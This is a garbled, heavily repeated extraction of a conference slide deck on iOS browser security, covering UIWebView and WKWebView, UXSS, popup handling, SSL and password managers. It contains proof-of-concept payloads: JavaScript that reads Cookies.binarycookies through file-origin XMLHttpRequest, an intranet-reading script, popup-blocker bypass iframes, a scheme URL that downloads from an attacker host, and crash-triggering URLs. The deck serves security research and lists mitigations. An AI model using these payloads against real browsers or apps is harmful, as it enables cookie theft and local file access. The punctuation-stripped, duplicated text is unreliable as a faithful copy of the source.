bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 53: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/53.jpg)
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 54: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/54.jpg)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 55: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/55.jpg)
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 56: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/56.jpg)
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 57: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/57.jpg)
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
